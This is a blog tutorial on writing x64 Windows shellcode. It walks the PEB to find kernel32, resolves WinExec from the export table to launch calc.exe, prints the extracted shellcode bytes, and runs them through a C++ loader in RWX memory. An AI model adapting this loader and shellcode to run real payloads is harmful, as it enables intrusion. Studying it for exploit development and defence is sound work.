x64 Assembly & Shellcoding 101

November 1, 2024 16 minute read

I have admittedly scoured the internet looking for examples of basic x64 shellcode development and have not had much luck. So many tutorials and lessons still focus on x86 assembly, and even many modern shellcode courses stick with x86. Don’t get me wrong, x86 is great and has a gentler learning curve. But most payloads in your offsec adventure will target the x64 architecture, and it makes a difference! My hope is to provide a step-by-step set of lessons that gives you, the reader, the resources and knowledge necessary to properly learn x64 assembly/shellcode development without too much headache along the way. Well then, let’s hop to it, shall we?

Disclaimer - I’m no guru when it comes to x64 assembly. But I know enough to guide those interested in learning the basics and producing working shellcode ready to use in exploit development, reverse engineering, and pentest engagements.

Finally, NASM (The Netwide Assembler) assembly syntax will be used as the syntax of choice for our x64 assembly coding needs. Let’s begin! 🐱

Part 1 - x64 Essentials: Registers

Okay, let’s go ahead and get the boring yet vital information out of the way first. In x64 assembly (under the Windows x64 calling convention), you have two types of registers:

Volatile: RAX, RCX, RDX, R8, R9, R10, R11
Non-Volatile: RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15

Volatile registers, as the name suggests, can have their values changed by a function call, so never assume they survive one.

Non-Volatile registers keep their value across function calls (a function that uses them must restore them before returning) and can be used reliably to store values you will need throughout your code.

Registers RCX, RDX, R8 and R9 carry the first four integer or pointer parameters, in that exact order. For instance, when you call ExitProcess and pass 0 as its first parameter, you use the register RCX, like so:

; --- ExitProcess ---
mov r15, rax ;address for ExitProcess previously acquired
mov rcx, 0   ;move '0' into the first and only expected parameter (the exit code)
call r15     ;Execute ExitProcess!!!

How about more than one parameter? Well, that would use RCX as the 1st parameter, and RDX as the second. If you had a 3rd and 4th parameter value, you would then use r8, and r9 respectively. Here’s the x64 assembly code for WinExec, passing the application string into RCX and the value ‘1’ into RDX. 1 equates to ‘Display Window’ if the application has a window/GUI to be displayed.

; --- WinExec ---
pop r15                         ;address for WinExec previously acquired
mov rax, 0x00                   ;NULL byte
push rax                        ;push to stack
mov rax, 0x6578652E636C6163     ;calc.exe 
push rax                        ;push to stack
mov rcx, rsp                    ; RCX, our first parameter, now points to the string of the application we wish to execute: "calc.exe"
mov rdx, 1                      ; move 1 into RDX as the 2nd parameter to display the application's GUI/window
sub rsp, 0x30                   ; I'll explain this in greater detail later.  It involves shadow space/16 byte stack alignment
call r15                        ; Execute WinExec!!!
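If the magic number 0x6578652E636C6163 looks odd, here is a rough C++ sketch of how such a value can be derived. x64 is little-endian, so the first character of the string has to sit in the lowest byte of the register. The helper name pack8 is my own invention for illustration; it is not part of NASM or any toolchain.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Pack up to 8 characters into a 64-bit immediate the way x64 lays it out in
// memory: the first character lands in the lowest byte (little-endian).
// Unused high bytes stay zero, which doubles as the string's NUL terminator.
// pack8 is a hypothetical helper name used only for this illustration.
inline std::uint64_t pack8(const char* text) {
    std::uint64_t value = 0;
    const std::size_t len = std::strlen(text);
    for (std::size_t i = 0; i < len && i < 8; ++i) {
        const std::uint64_t byte = static_cast<unsigned char>(text[i]);
        value |= byte << (8 * i);  // character i goes into byte i
    }
    return value;
}
```

Calling pack8("calc.exe") gives the immediate used in the WinExec listing. Because "calc.exe" fills all 8 bytes, there is no room left for a terminator, which is why the listing pushes a separate zero qword first.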

How about all 4 parameters? We can use MessageBoxA to demonstrate that:

mov r15, rax                   ; MessageBoxA address previously acquired
mov rcx, 0                     ; 1st Parameter - hWnd = NULL (no owner window)
mov rax, 0x006D                ; move the final letter, 'm' (0x6D), into RAX; the zero upper bytes null terminate the string
push rax                       ; push 'm' and its null terminator onto the stack
mov rax, 0x3374737973743367    ; move the first 8 characters of the string, 'g3tsyst3', into RAX
push rax                       ; push 'g3tsyst3' onto the stack; RSP now points to "g3tsyst3m"
mov rdx, rsp                   ; 2nd Parameter - lpText = pointer to message
    
mov r8, rsp                    ; 3rd Parameter - lpCaption = pointer to title
mov r9d, 0                     ; 4th Parameter - uType = MB_OK (OK button only)

sub rsp, 0x30                  ;I'll explain this in greater detail later.  It involves shadow space/16 byte stack alignment
call r15                       ; Call MessageBoxA

Notice how I use register R15 to store the address of the API. I chose this register because, like its counterparts R14, R13, and R12, it is non-volatile, meaning it won’t be altered by a function call. These non-volatile registers are essential when you need to preserve a value that hasn’t been pushed to the stack. Here’s an example of the register values before and after a function call. Notice how the volatile registers’ values change as expected, but R15 remains as-is.

Before the CALL:

After the CALL:

Okay! So that’s the general breakdown on x64 Registers. Moving on!

Part 1 - x64 Essentials: Stack Alignment

We’re almost finished with the dry material, I promise. The fun stuff is just around the corner. 😺 Okay, moving on. Let’s discuss the 16 byte stack alignment convention. If that sounds like a foreign language to you, don’t fret. It’s fairly straightforward, albeit somewhat tedious to implement. I’ll break it down as simply as I can.

The stack operates in 16 byte boundaries in x64 assembly. Before you make a function call, the stack needs to be aligned according to this principle.

Simply put, RSP needs to be divisible by 16 before a function call.

Instead of focusing solely on the specific value of RSP for 16-byte alignment, you can view the requirement as needing the stack pointer (RSP) to be at any address that is a multiple of 16 (i.e., 0x10, 0x20, 0x30, etc.). This means any value of RSP that results in RSP % 16 == 0 is considered aligned.

Examples of Divisibility:

PUSH and CALL are examples of instructions that cause the stack pointer to decrement by 8 bytes. POP increments the stack pointer by 8. This will alter the stack alignment. For example:

Before the POP instruction, the low byte of RSP is 0x88, or 136 in decimal. This is NOT divisible by 16 (136/16 = 8.5). However…

After the POP instruction, which remember increases RSP by 8 bytes, we’re back to the stack being divisible by 16.

Now the low byte of RSP holds the hex value 0x90, which is 144 in decimal and divisible by 16 (144/16 = 9)! A handy shortcut: in hex, an address is 16-byte aligned exactly when its last digit is 0. It’s very mathematical in nature when you think about it. Love it or hate it, this is part of x64 assembly, but it’s not as painful as it may seem. It’s best that the stack remain aligned during the entirety of your code, but it’s most important before a function call. If the stack isn’t properly aligned, the function you call can crash (aligned SSE instructions such as movaps fault on a misaligned stack) or fail in confusing ways.
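To make the arithmetic concrete, here is a small C++ sketch of the alignment rule. The helper names and the sample RSP value 0x14FE88 are made up for illustration; only the low byte (0x88) matches the walkthrough above.

```cpp
#include <cassert>
#include <cstdint>

// RSP is 16-byte aligned when its lowest four bits are zero (RSP % 16 == 0).
constexpr bool is_aligned16(std::uint64_t rsp) { return (rsp & 0xF) == 0; }

// PUSH and CALL move RSP down by 8 bytes; POP moves it back up by 8.
constexpr std::uint64_t after_push(std::uint64_t rsp) { return rsp - 8; }
constexpr std::uint64_t after_pop(std::uint64_t rsp) { return rsp + 8; }

// Same effect as "and rsp, 0xFFFFFFFFFFFFFFF0": round RSP down to a multiple of 16.
constexpr std::uint64_t align_down16(std::uint64_t rsp) {
    return rsp & ~std::uint64_t{0xF};
}

// Hypothetical RSP value ending in 0x88, as in the walkthrough.
constexpr std::uint64_t kSampleRsp = 0x14FE88;

static_assert(!is_aligned16(kSampleRsp), "0x...88 is not a multiple of 16");
static_assert(is_aligned16(after_pop(kSampleRsp)), "POP brings it to 0x...90");
static_assert(!is_aligned16(after_push(after_pop(kSampleRsp))), "a PUSH misaligns it again");
static_assert(align_down16(kSampleRsp) == 0x14FE80, "AND with ~0xF rounds down");
```

The takeaway is that a single PUSH, POP, or CALL always flips the alignment, while pairs of them (or a sub/add of a multiple of 16) leave it unchanged.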

Part 1 - x64 Essentials: Shadow Space

Okay, hope you’re still with me and everything is making sense so far. If something still isn’t quite sinking in, hit me up on X with a PM. Happy to help field any and all questions. Alright, I promise we’re almost to the end of the x64 Essentials portion of this writeup! 🐶 Let’s talk about Shadow Space (aka home space, aka spill space) now.

In the Windows x64 calling convention, the caller is required to reserve 32 bytes (4 slots of 8 bytes) as shadow space for the callee, even if the function doesn’t need it. This space is reserved but isn’t automatically adjusted unless explicitly handled with an instruction like sub rsp, 0x20 or more.

Functions frequently need additional stack space for local variables and further alignment. You might see sub rsp, 0x30 or even larger adjustments like sub rsp, 0x40 to allocate both shadow space and additional space before the function call. I do this often in my own code. Once again, this helps ensure adequate space is available when the function needs to place expected values as well as potential unexpected values on the stack AND helps ensure RSP remains 16-byte aligned. Here’s a visual to help make more sense of this.
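One way to reason about how much to subtract from RSP is sketched below in C++. It assumes you know the value of RSP right before the sub instruction; the function name reserve_bytes and the sample addresses are hypothetical, and this is just how I think about it, not an official formula.

```cpp
#include <cassert>
#include <cstdint>

// The Windows x64 convention asks the caller for 32 bytes of shadow space.
constexpr std::uint64_t kShadowSpace = 0x20;

// Smallest amount to subtract from RSP that covers the shadow space plus
// `extra` bytes of scratch room AND leaves RSP on a 16-byte boundary.
// reserve_bytes is a hypothetical helper name used only for illustration.
constexpr std::uint64_t reserve_bytes(std::uint64_t rsp, std::uint64_t extra) {
    // (rsp - needed) & 0xF is how far past a 16-byte boundary we would land,
    // so subtracting that much more rounds the result down to the boundary.
    return kShadowSpace + extra + ((rsp - kShadowSpace - extra) & 0xF);
}

// Aligned stack, nothing extra: the bare minimum of 0x20.
static_assert(reserve_bytes(0x1000, 0) == 0x20, "shadow space only");
// RSP ending in 8 (for example right after a CALL pushed a return address).
static_assert(reserve_bytes(0x1008, 0) == 0x28, "0x20 plus 8 bytes of padding");
// Aligned stack plus 16 bytes of scratch room.
static_assert(reserve_bytes(0x1000, 0x10) == 0x30, "shadow space plus 0x10");
```

The second case is why you so often see sub rsp, 0x28 at the very top of a function: on entry RSP ends in 8 because the CALL that got you there pushed an 8 byte return address.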

First, I’ll comment out the shadow space allocation before the function call and see what happens:

Then assemble and link it (I like using ld.exe to link my x64 assembly code):

RCX has the kernel32 base address, RDX holds a pointer to our LoadLibraryA string, and R15 holds the address to GetProcAddress:

If we totally neglect reserving any shadow space before the function call, the return value that normally gets placed into RAX never shows up. If RAX is 0 after a function call, it’s usually not a good thing. The function we call is allowed to write into the 32 bytes we are expected to reserve for it, so without that space our parameters and other data on the stack likely got clobbered. Check it out:

BEFORE:

AFTER:

Alright, so this proves how things can go badly without setting up the proper shadow space reserves. Let’s do that now and see if things play out better for us: 😸

Now we will add in the shadow space, rebuild the program, break at the same location in the debugger, and see what happens:

BINGO! There it is, our LoadLibraryA API address as we hoped for. Right there waiting expectantly for us in the RAX register. You’ll also see our shadow space stack adjustment too:

I could go on and on about ways to mitigate potential shadow space issues. But this will give you a good idea of what to expect, and how to prepare for function calls using x64 16 byte stack alignment and shadow space requirements. If you’d like more information on this topic, as always hit me up on X and I can talk about this in greater detail. Now that we have a good overview of registers and stack alignment requirements for x64 assembly, let’s dive into the next section of this writeup.

Part 2 - x64 First Program: Dynamically locate WinExec and execute calc.exe

Finally! We’re on to something exciting after all the necessary boring stuff is out of the way. (admittedly I like the boring stuff, but it is a bit dry…I get it) 😄

Okay, I’m going to assume that you have familiarized yourself with some of the conventional x64 instructions. If not, no worries! I’ll include comments to explain the most common instructions you should be familiar with and help you understand how they work. I’m also assuming you know the basic template for locating the kernel32 base address and walking the PE (Portable Executable) file’s Export Table to find ordinals for function/API names. I’d recommend familiarizing yourself with the PE export table when you get the chance, but you can just build off of my template for now.

Let’s start by locating kernel32 base address. This is actually very simple!

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -o x64findkernel32.exe x64findkernel32.obj

BITS 64
SECTION .text
global main
main:

sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
xor rcx, rcx             ;RCX = 0
mov rax, [gs:rcx + 0x60] ;RAX = PEB
mov rax, [rax + 0x18]    ;RAX = PEB / Ldr
mov rsi,[rax+0x10]       ;PEB_Ldr / InLoadOrderModuleList
mov rsi, [rsi]           ;could substitute lodsq here instead if you like
mov rsi,[rsi]            ;also could substitute lodsq here too
mov rbx, [rsi+0x30]      ;kernel32.dll base address
mov r8, rbx              ;mov kernel32.dll base addr into register of your choosing

Okay, the kernel32 base address is now in r8. r8 is a volatile register, so be sure to copy its value to a non-volatile register if you need it more than once, as it will almost certainly be overwritten once your first function call takes place. Let’s test it out and see if we get the kernel32 base address. Sure enough, there it is in RBX and also in R8 where we copied it:

Now that we have our kernel32 base address, let’s go ahead and get our total function count and RVA/VMA info:

;Code for parsing Export Address Table
mov ebx, [rbx+0x3C]           ; Offset of the PE header (e_lfanew, stored at 0x3C) into EBX
add rbx, r8                   ; kernel32 base + offset = address of the PE header
mov edx, [rbx+0x88]           ; RVA of the Export Table, found 0x88 bytes into the PE header
add rdx, r8                   ; kernel32.dll + RVA ExportTable = ExportTable Address
mov r10d, [rdx+0x14]          ; Total count for number of functions (NumberOfFunctions)
xor r11, r11                  ; clear R11 
mov r11d, [rdx+0x20]          ; AddressOfNames = RVA
add r11, r8                   ; AddressOfNames = VMA
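If you are wondering where offsets like 0x14, 0x1c, 0x20 and 0x24 come from, they are field offsets inside the export directory structure (IMAGE_EXPORT_DIRECTORY in the Windows headers). Here is a C++ sketch that mirrors the layout with plain fixed-width types so it builds anywhere. The struct name ExportDirectory is my own stand-in; on Windows you would use the real definition from winnt.h.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Stand-in for IMAGE_EXPORT_DIRECTORY, written with fixed-width types so the
// sketch does not depend on windows.h. Field order follows the PE format.
struct ExportDirectory {
    std::uint32_t Characteristics;
    std::uint32_t TimeDateStamp;
    std::uint16_t MajorVersion;
    std::uint16_t MinorVersion;
    std::uint32_t Name;                   // RVA of the DLL name string
    std::uint32_t Base;                   // starting ordinal number
    std::uint32_t NumberOfFunctions;      // read via [rdx+0x14]
    std::uint32_t NumberOfNames;          // entries in the name table
    std::uint32_t AddressOfFunctions;     // read via [rdx+0x1c]
    std::uint32_t AddressOfNames;         // read via [rdx+0x20]
    std::uint32_t AddressOfNameOrdinals;  // read via [rdx+0x24]
};

// The offsets used in the assembly fall straight out of the layout.
static_assert(offsetof(ExportDirectory, NumberOfFunctions) == 0x14, "count");
static_assert(offsetof(ExportDirectory, NumberOfNames) == 0x18, "names count");
static_assert(offsetof(ExportDirectory, AddressOfFunctions) == 0x1C, "functions");
static_assert(offsetof(ExportDirectory, AddressOfNames) == 0x20, "names");
static_assert(offsetof(ExportDirectory, AddressOfNameOrdinals) == 0x24, "ordinals");
static_assert(sizeof(ExportDirectory) == 0x28, "whole structure is 40 bytes");
```

Note that the structure also carries NumberOfNames at 0x18. The name table has exactly that many entries, so it is the tighter bound if you ever adapt the search loop.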

Next, let’s plug in the function name we want to look for and setup our function counter:

mov rcx, r10                  ; Setup loop counter

mov rax, 0x00636578456E6957   ;"WinExec" string NULL terminated with a '0' 
push rax                      ;push to the stack
mov rax, rsp                  ;RAX now points to our WinExec string on the stack
add rsp, 8                    ;undo the push to keep 16 byte stack alignment (the string stays in memory just below RSP)
jmp kernel32findfunction

Now, let’s find the function in question:

; Loop over Export Address Table to find WinApi names
kernel32findfunction: 
    jecxz FunctionNameNotFound    ; If ECX is zero (function not found), jump to the breakpoint
    xor ebx,ebx                   ; Zero EBX
    mov ebx, [r11+rcx*4]          ; EBX = RVA of the name at index RCX in AddressOfNames
    add rbx, r8                   ; RBX = Function name VMA / add kernel32 base address to RVA to get WinApi name
    dec rcx                       ; Decrement our counter by one; the table is walked from the last name to the first (Z to A)
   
    mov r9, qword [rax]           ; R9 = "WinExec"
    cmp [rbx], r9                 ; Compare the first 8 bytes of the export name against "WinExec" plus its NULL
    jz FunctionNameFound          ; jump if zero flag is set (found function name!)
    jnz kernel32findfunction      ; didn't find the name, so keep loopin til we do!

FunctionNameFound:
push rcx                               ; found it, so save it for later
jmp OrdinalLookupSetup

FunctionNameNotFound:
int3

And now the final stretch of code:

OrdinalLookupSetup:  ;We found our target WinApi position in the functions lookup
   pop r15         ;WinExec position in the name table
   js OrdinalLookup ;taken or not, execution continues at OrdinalLookup
   
OrdinalLookup:   
   mov rcx, r15                  ; move our function's place into RCX
   xor r11, r11                  ; clear R11 for use
   mov r11d, [rdx+0x24]          ; AddressOfNameOrdinals = RVA
   add r11, r8                   ; AddressOfNameOrdinals = VMA
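   ; Get the function ordinal from AddressOfNameOrdinals
   inc rcx                       ; undo the extra 'dec rcx' from the search loop so RCX is the index of the matching name
   mov r13w, [r11+rcx*2]         ; AddressOfNameOrdinals + Counter. RCX = counter (only the low 16 bits of R13 are written)
   ;With the function ordinal value, we can finally lookup the WinExec address from AddressOfFunctions.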

   xor r11, r11
   mov r11d, [rdx+0x1c]          ; AddressOfFunctions = RVA
   add r11, r8                   ; AddressOfFunctions VMA in R11. Kernel32+RVA for function addresses
   mov eax, [r11+r13*4]          ; function RVA.
   add rax, r8                   ; Found the WinExec Api address!!!
   push rax                      ; Store function addresses by pushing it temporarily
   js executeit

Let’s see if our WinExec API address is now in RAX:

Sure enough, there it is!
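If the three-table dance is hard to follow in assembly, here is the same lookup as a C++ sketch over a mock export table. Everything in it is hypothetical: the MockExports type, the helper names, and the sample names, ordinals and RVAs are invented stand-ins, not real kernel32 data. The point is only the order of the lookups: name index, then ordinal, then function RVA.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Mock of the three parallel export tables (all values are made up).
struct MockExports {
    std::vector<std::string>   names;      // stands in for AddressOfNames
    std::vector<std::uint16_t> ordinals;   // AddressOfNameOrdinals, parallel to names
    std::vector<std::uint32_t> functions;  // AddressOfFunctions, indexed by ordinal
};

// Returns the function RVA for `wanted`, or 0 if the name is not exported.
// Walks the name table from the last entry to the first, like the assembly.
inline std::uint32_t find_export_rva(const MockExports& table,
                                     const std::string& wanted) {
    for (std::size_t i = table.names.size(); i-- > 0;) {
        if (table.names[i] != wanted) continue;          // step 1: match the name
        const std::uint16_t ordinal = table.ordinals[i]; // step 2: name index -> ordinal
        if (ordinal >= table.functions.size()) return 0; // malformed table guard
        return table.functions[ordinal];                 // step 3: ordinal -> RVA
    }
    return 0;
}

// Tiny sample table with invented values for experimenting.
inline MockExports sample_exports() {
    return MockExports{
        {"AcquireSRWLockExclusive", "ExitProcess", "WinExec"},
        {2, 0, 1},
        {0x1000, 0x2000, 0x3000},
    };
}
```

With the sample table, "WinExec" sits at name index 2, its ordinal is 1, and functions[1] is 0x2000. In the real thing you then add the kernel32 base address to that RVA, which is what the final add rax, r8 does.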

Now let’s use our newfound WinExec address to execute calc.exe!

executeit:
; --- prepare to call WinExec ---
pop r15                         ;address for WinExec
mov rax, 0x00                   ; null string terminator '0'
push rax                        ; push it onto the stack
mov rax, 0x6578652E636C6163     ; move string 'calc.exe' into RAX 
push rax                        ; push the string; it now sits directly below the null terminator
mov rcx, rsp                    ; RCX points to the "calc.exe" string on the stack (1st parameter)
mov rdx, 1                      ; move 1 (show window parameter) into RDX (2nd parameter)
sub rsp, 0x30                   ; reserve shadow space while keeping the stack 16 byte aligned
call r15                        ; Call WinExec!!

I don’t need to take a pic of calc. Just trust me, it loaded 😸 HOWEVER!!! This program does not exit gracefully because we never locate and call ExitProcess. That can be your homework. Try to use the information gleaned in this writeup to also locate ExitProcess (it’s also in kernel32.dll) and exit this program cleanly. Okay, onto our last segment…

Part 3 - Convert to x64 Shellcode: execute your custom shellcode

First off, go ahead and assemble it:

nasm.exe -f win64 winexec.asm -o winexec.o

That will produce an object file (winexec.o). Now, just do the following:

objdump -d winexec.o

You should get your shellcode output along with your assembly instructions. Here’s what mine looks like.

Disassembly of section .text:

0000000000000000 <main>:
   0:   48 83 ec 28             sub    $0x28,%rsp
   4:   48 83 e4 f0             and    $0xfffffffffffffff0,%rsp
   8:   48 31 c9                xor    %rcx,%rcx
   b:   65 48 8b 41 60          mov    %gs:0x60(%rcx),%rax
  10:   48 8b 40 18             mov    0x18(%rax),%rax
  14:   48 8b 70 10             mov    0x10(%rax),%rsi
  18:   48 8b 36                mov    (%rsi),%rsi
  1b:   48 8b 36                mov    (%rsi),%rsi
  1e:   48 8b 5e 30             mov    0x30(%rsi),%rbx
  22:   49 89 d8                mov    %rbx,%r8
  25:   8b 5b 3c                mov    0x3c(%rbx),%ebx
  28:   4c 01 c3                add    %r8,%rbx
  2b:   8b 93 88 00 00 00       mov    0x88(%rbx),%edx
  31:   4c 01 c2                add    %r8,%rdx
  34:   44 8b 52 14             mov    0x14(%rdx),%r10d
  38:   4d 31 db                xor    %r11,%r11
  3b:   44 8b 5a 20             mov    0x20(%rdx),%r11d
  3f:   4d 01 c3                add    %r8,%r11
  42:   4c 89 d1                mov    %r10,%rcx
  45:   48 b8 57 69 6e 45 78    movabs $0x636578456e6957,%rax
  4c:   65 63 00
  4f:   50                      push   %rax
  50:   48 89 e0                mov    %rsp,%rax
  53:   48 83 c4 08             add    $0x8,%rsp
  57:   eb 00                   jmp    59 <kernel32findfunction>

0000000000000059 <kernel32findfunction>:
  59:   67 e3 19                jecxz  75 <FunctionNameNotFound>
  5c:   31 db                   xor    %ebx,%ebx
  5e:   41 8b 1c 8b             mov    (%r11,%rcx,4),%ebx
  62:   4c 01 c3                add    %r8,%rbx
  65:   48 ff c9                dec    %rcx
  68:   4c 8b 08                mov    (%rax),%r9
  6b:   4c 39 0b                cmp    %r9,(%rbx)
  6e:   74 02                   je     72 <FunctionNameFound>
  70:   75 e7                   jne    59 <kernel32findfunction>

0000000000000072 <FunctionNameFound>:
  72:   51                      push   %rcx
  73:   eb 01                   jmp    76 <OrdinalLookupSetup>

0000000000000075 <FunctionNameNotFound>:
  75:   cc                      int3

0000000000000076 <OrdinalLookupSetup>:
  76:   41 5f                   pop    %r15
  78:   78 00                   js     7a <OrdinalLookup>

000000000000007a <OrdinalLookup>:
  7a:   4c 89 f9                mov    %r15,%rcx
  7d:   4d 31 db                xor    %r11,%r11
  80:   44 8b 5a 24             mov    0x24(%rdx),%r11d
  84:   4d 01 c3                add    %r8,%r11
  87:   48 ff c1                inc    %rcx
  8a:   66 45 8b 2c 4b          mov    (%r11,%rcx,2),%r13w
  8f:   4d 31 db                xor    %r11,%r11
  92:   44 8b 5a 1c             mov    0x1c(%rdx),%r11d
  96:   4d 01 c3                add    %r8,%r11
  99:   43 8b 04 ab             mov    (%r11,%r13,4),%eax
  9d:   4c 01 c0                add    %r8,%rax
  a0:   50                      push   %rax
  a1:   78 00                   js     a3 <executeit>

00000000000000a3 <executeit>:
  a3:   41 5f                   pop    %r15
  a5:   b8 00 00 00 00          mov    $0x0,%eax
  aa:   50                      push   %rax
  ab:   48 b8 63 61 6c 63 2e    movabs $0x6578652e636c6163,%rax
  b2:   65 78 65
  b5:   50                      push   %rax
  b6:   48 89 e1                mov    %rsp,%rcx
  b9:   ba 01 00 00 00          mov    $0x1,%edx
  be:   48 83 ec 30             sub    $0x30,%rsp
  c2:   41 ff d7                call   *%r15

Now let’s extract the shellcode:

for i in $(objdump -D winexec.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done

Here’s what it looks like with just the machine code extracted:

"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b"
"\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89"
"\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00\x00\x4c\x01\xc2\x44\x8b"
"\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x48\xb8\x57"
"\x69\x6e\x45\x78\x65\x63\x00\x50\x48\x89\xe0\x48\x83\xc4\x08\xeb\x00\x67"
"\xe3\x19\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c"
"\x39\x0b\x74\x02\x75\xe7\x51\xeb\x01\xcc\x41\x5f\x78\x00\x4c\x89\xf9\x4d"
"\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d"
"\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xab\x4c\x01\xc0\x50\x78"
"\x00\x41\x5f\xb8\x00\x00\x00\x00\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78"
"\x65\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x48\x83\xec\x30\x41\xff\xd7";
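If you would rather not rely on the shell one-liner, the same formatting step is easy to sketch in C++. The helper names format_shellcode and count_null_bytes are my own; feed them whatever raw bytes you pulled out of the object file. The second helper simply counts 0x00 bytes, which you can already spot in the listing (for example the mov $0x0,%eax instruction).

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Turn raw machine code bytes into a "\x48\x83..." style string.
// format_shellcode is a hypothetical helper name used for illustration.
inline std::string format_shellcode(const std::vector<std::uint8_t>& bytes) {
    static const char kHex[] = "0123456789abcdef";
    std::string out;
    out.reserve(bytes.size() * 4);  // each byte becomes 4 characters
    for (std::uint8_t b : bytes) {
        out += "\\x";               // a literal backslash followed by 'x'
        out += kHex[b >> 4];        // high nibble
        out += kHex[b & 0xF];       // low nibble
    }
    return out;
}

// Count the 0x00 bytes in the buffer.
inline std::size_t count_null_bytes(const std::vector<std::uint8_t>& bytes) {
    return static_cast<std::size_t>(
        std::count(bytes.begin(), bytes.end(), std::uint8_t{0}));
}
```

For example, passing the first four bytes of the listing (48 83 ec 28) to format_shellcode produces the text \x48\x83\xec\x28, ready to paste into a C or C++ string literal.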

Now, the final piece to all of this. Let’s add the x64 shellcode to a custom C++ program and execute it!

#include <windows.h>
#include <cstring>   // memcpy
#include <iostream>

unsigned char shellcode[] =
"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60"
"\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b"
"\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00"
"\x00\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d"
"\x01\xc3\x4c\x89\xd1\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x00\x50"
"\x48\x89\xe0\x48\x83\xc4\x08\xeb\x00\x67\xe3\x19\x31\xdb\x41\x8b"
"\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b\x74\x02"
"\x75\xe7\x51\xeb\x01\xcc\x41\x5f\x78\x00\x4c\x89\xf9\x4d\x31\xdb"
"\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d"
"\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xab\x4c\x01\xc0"
"\x50\x78\x00\x41\x5f\xb8\x00\x00\x00\x00\x50\x48\xb8\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x48\x83"
"\xec\x30\x41\xff\xd7";

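int main() {
    // Allocate memory that is readable, writable and executable
    void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (exec_mem == nullptr) {
        std::cerr << "Memory allocation failed\n";
        return -1;
    }
    // Copy the shellcode into the executable buffer
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    // Treat the buffer as a function taking no arguments and call it
    auto shellcode_func = reinterpret_cast<void(*)()>(exec_mem);
    shellcode_func();
    // Only reached if the shellcode returns; ours has no ret or ExitProcess yet
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}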

Believe it or not, we’re just warming up! I hope you’re as excited as I am, because the next section will cover removing NULL bytes so we can use this shellcode in buffer overflow exploits! 😸 I also hope this has been informative and somewhat easy to follow. It takes me a while to piece together all the info, and I wish I had more time to go into even more detail on each aspect of x64 assembly / shellcoding, but this is all the time I can commit to this portion of our walkthrough for now. Thank you everyone! Next time we will focus on removing NULL bytes (’00s’) and learn how to dynamically locate functions using ‘GetProcAddress’ and pop a MessageBox. See ya then!

R.B.C (g3tsyst3m)
